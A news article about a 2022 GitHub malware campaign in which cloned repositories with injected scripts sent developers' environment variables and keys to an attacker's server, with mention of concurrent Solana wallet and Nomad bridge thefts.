A massive GitHub malware attack resulted in 35,000 “code hits” on the same day when hundreds of wallets with Solana addresses had millions of dollars taken out of them.
So far, the attack has affected several projects, including crypto, Bash, JavaScript, Python, Kubernetes, Golang, and Docker.
GitHub malware attack dupes developers
Stephen Lacy, a GitHub developer who originally reported the problem earlier on Wednesday, underlined the attack’s broad reach. The developer discovered the problem as he was looking at a project that he had discovered via Google.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9— Stephen Lacy (@stephenlacy) August 3, 2022
The NPM script, a useful way to group common shell tasks for a project, install docs, and the docker images are the targets of the malware attack.
The attacker builds a fake repository and pushes clones of legitimate projects to GitHub. As a result, this move deceives developers and gains access to sensitive data. The fake repository refers to the containment of all the project’s contents and the revision history for each file.
Thousands of repos cloned
When a malware attacks a developer, the script’s full environment variable (ENV), application, or laptop (Electron applications) communicates to the attacker’s server. The ENV contains crypto keys, Amazon Web Services access, security keys, and other information.
Many of these clone repositories pushed these as “pull requests”. In other words, the requests allow developers to notify others about changes they made to a branch in a GitHub repository.
“Developers should GPG-sign their repository revisions,” the developer said in a GitHub issue report. Each revision coming from a reliable source offers means of better defense. GPG keys add additional security to GitHub accounts and software projects.
The crypto market has not had a good week. A few hours after the $190 million Nomad bridge hack earlier this week, an estimated $8 million worth of Solana wallets were compromised.